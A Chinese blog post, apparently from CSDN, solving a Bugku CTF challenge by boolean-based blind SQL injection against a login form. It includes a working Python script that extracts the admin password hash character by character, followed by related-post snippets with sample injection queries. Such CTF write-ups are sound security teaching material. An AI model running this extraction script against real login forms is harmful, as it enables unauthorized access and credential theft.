bugku基于布尔的SQL盲注

最新推荐文章于 2024-06-19 13:35:01 发布
最新推荐文章于 2024-06-19 13:35:01 发布
阅读量818 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48511129/article/details/113196732
版权

在这里插入图片描述
解题思路:我用用户名admin,密码123456,提示密码错误
我用用户名admina,密码123456,提示用户名错误,说明用户名是admin
我的字典sql盲注无法破解密码,于是我在网上找了一个大佬写的pycharm脚本(记得安装requests库和改url)

import requests
import time

url = "http://114.67.246.176:13918"
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE'
}
with requests.session() as s:
    database = "passwd:"
    s.keep_alive = False
    s.adapters.DEFAULT_RETRIES = 5
    for i in range(1, 32):
        for j in range(48, 128):
            sql = 'admi\'or((ascii(substr((select(password))from({0})))-{1}))--\''.format(i, j)

            data = {'username': sql, 'password': "123"}
            try:
                res = s.post(url, data=data, timeout=5, headers=headers)
            except:
                time.sleep(2)
                res = s.post(url, data=data, timeout=5, headers=headers)
            if 'username does not exist' in res.text:
                database += chr(j)
                print(database)
                break
            res.close()

破解得到passwd:4dcc88f8f1bc05e7c2ad1a60288481a
在这里插入图片描述
将4dcc88f8f1bc05e7c2ad1a60288481a进行md5解密得到
在这里插入图片描述
得到密码bugctf,于是用用户名admin,密码bugctf登入得到flag
在这里插入图片描述
最后附上md5免费在线解密网址:
https://www.somd5.com/

g1ory.
关注
Bugku流量分析题目总结
qq_42857451的博客
11-10 1448
0x01 flag被盗 题目链接:https://ctf.bugku.com/files/e0b57d15b3f8e6190e72987177da1ffd/key.pcapng 解题思路: 这个题目是比较基本的流量分析题,拿到数据包后,查看几个数据比较大的可疑数据,追踪TCP流即可拿到flag flag:flag{This_is_a_f10g} 0x02 中国菜刀 题目链接:htt...
BugkuCTF-分析-信息提取
venu_s的博客
04-11 1129
BugkuCTF–分析–信息提取 题目连接:信息提取 下载文件,可以发现是一道流量分析的题目,用wireshark打开 根据题目的提示和流量包的内容可以知道这是一次布尔盲注的完整过程,所以我们直接过滤出http流量 接下来找出注入flag的地方,发现是从第806个流量包开始的,查看流量包 发现注入的方法是二分法,这里简单的介绍一些 ORD和MID ord() ...
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
Bugku sql注入 基于布尔SQL盲注
plant1234的博客
06-21 3440
sql注入:
sql注入之盲注
最新发布
weixin_64815500的博客
06-19 1077
sql注入关于无回显用到的盲注sqli-labs靶场为例子讲解常用盲注类型以及函数。面试或者打ctf可用作参考
bugku】web38 基于布尔SQL盲注
EC_Carrot的博客
12-25 768
题目 进去后是一个登陆界面,照常用admin登陆随便一个密码,发现说password error,在admin加上个'提示username does not exist!,再加上题目提示基于布尔SQL盲注,猜测后端是判断username是否存在,这里可能就会有注入点。输入了and发现提示illegal character,说明有过滤。 先FUZZ测试一下发现and、+、=等许多东西都给过滤了,但是^、ascii、substr等用于盲注的函数都还在,主要的空格可以用()绕过,=可以用<>来代替
Bugku sql注入 基于布尔SQL盲注 经典题where information过滤
m0_64180167的博客
10-16 678
考核中遇到的题 爆出数据库 就完全不知道怎么做了这里拿到原题记录一下首先拿到登入界面我们来进行测试输入 admin 密码随便输入输入 admin123 密码随便输入发现了 这里admin是存在数据库中的 但是不存在就会回显不存在所以这里我们可以确定了 admin 是true的然后我们开始fuzz发现过滤了巨多。。。。。where information啥都是过滤然后我们一个一个绕过。
php基于错误的盲注,Bugku-CTF之login3(SKCTF)(基于布尔SQL盲注
weixin_36161279的博客
04-14 208
Day41login3(SKCTF)http://123.206.31.85:49167/flag格式:SKCTF{xxxxxxxxxxxxx}hint:基于布尔SQL盲注本题要点:异或运算、布尔盲注、过滤打开是一个登录窗口用bp抓一下包发送至repeater没什么新发现........随便试试其他用户名,看看回显信息我们可以发现当我们随便输入一个用户名“qwe”时, 回显用户名不存在,但并没有...
bugku-Web-login3(SKCTF)(登录用户名+异或方式的bool盲注)
Sea_Sand息禅
04-05 1078
题目给出了提示:基于布尔SQL盲注 打开网页,是登录框,那我们很大可能就是在username或password上进行注入,可能性大一点的是username了吧。 首先输进行一些尝试,找出正确的注入地方以及是否进行了过滤。 反馈是password error! 输入用户名admin1,得到username does not exist!,所以这里应该是先对username进行查询,这...
bugku web题INSERT INTO注入.docx
05-16
- **基于时间的盲注**:通过观察服务器响应时间的变化来推断SQL查询的结果。这种方式适用于没有明显错误提示的情况。 #### 四、技术细节 - **绕过逗号限制**:由于程序使用`explode(',', $ip)`分割字符串,这导致...
Bugku_web_login3(关于有过滤的sql盲注)
silence1_的博客
09-01 620
Bugku_web_login3(SKCTF) 题目 题目链接:http://123.206.31.85:49167/ hint:基于布尔SQL盲注 打开题目是一个登录框,先试试admin,admin,回显password error! 再试试admin’,admin,回显username does not exist 可见username是admin,再试试admin’# ,又回显pass...
Sql盲注
qq_40077103的博客
09-17 1703
盲注就是sql语句注入后并且成功执行,但是执行的结果不能返回前端,所以需要通过一些其他信息间接推断数据。 盲注分为三类 一、基于布尔盲注 基于布尔盲注使用逻辑判断推测获取的数据,通过给定条件,服务器返回真或假使用二分法或者正则表达式等方法缩小判断的范围。 通常会使用sql中的截取字符串函数,以下是一些常见的函数 mid(column_name,start[,length])  #co...
sql盲注
weixin_44721672的博客
04-07 264
通过SQL注入的基础篇,我们掌握了在没有任何过滤的情况下而且还带有回显的位的注入 如何我们在注入的时候发现输入都是正确的,但是网页没办法回显出数据,而是回显是一个正常的网页或者说回显一个正确的网页没有报错呢。这就要基于SQL盲注SQL盲注分类:1,通过编码判断猜测数据(如:ASCII编码) 2,通过报错的形势显示出我们注入的数据 3,通过延迟的方式测试数据 查看源码,发现闭合是通过 ’ 闭...
post基于布尔盲注
05-05
基于布尔盲注是一种常见的SQL注入攻击技术,可以通过构造特定的SQL查询语句来获取数据库中的敏感信息。在这种攻击中,攻击者通过向受攻击的应用程序中输入恶意的SQL代码来触发漏洞。 在基于布尔盲注中,攻击者利用应用程序返回的不同响应来判断SQL查询结果是否为真或假。攻击者可以通过构造一系列的布尔查询来逐渐推断出数据库中的敏感信息。例如,攻击者可以通过构造以下查询语句来判断数据库中是否存在用户名为“admin”的记录: ``` SELECT COUNT(*) FROM users WHERE username = 'admin' AND 1=1 ``` 如果应用程序返回的响应为真,那么攻击者可以通过构造以下查询语句来判断密码是否为“password”: ``` SELECT COUNT(*) FROM users WHERE username = 'admin' AND password = 'password' AND 1=1 ``` 如果应用程序返回的响应为假,那么攻击者可以通过构造以下查询语句来判断密码是否为“password”: ``` SELECT COUNT(*) FROM users WHERE username = 'admin' AND password <> 'password' AND 1=1 ``` 通过不断尝试构造不同的查询语句,并观察应用程序的响应,攻击者可以最终推断出数据库中的敏感信息。 为了防止基于布尔盲注攻击,应用程序应该对用户输入进行充分的验证和过滤,并使用参数化的SQL查询语句来避免SQL注入攻击。此外,应用程序还应该限制数据库用户的权限,以最小化攻击者获取敏感信息的可能性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

g1ory.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值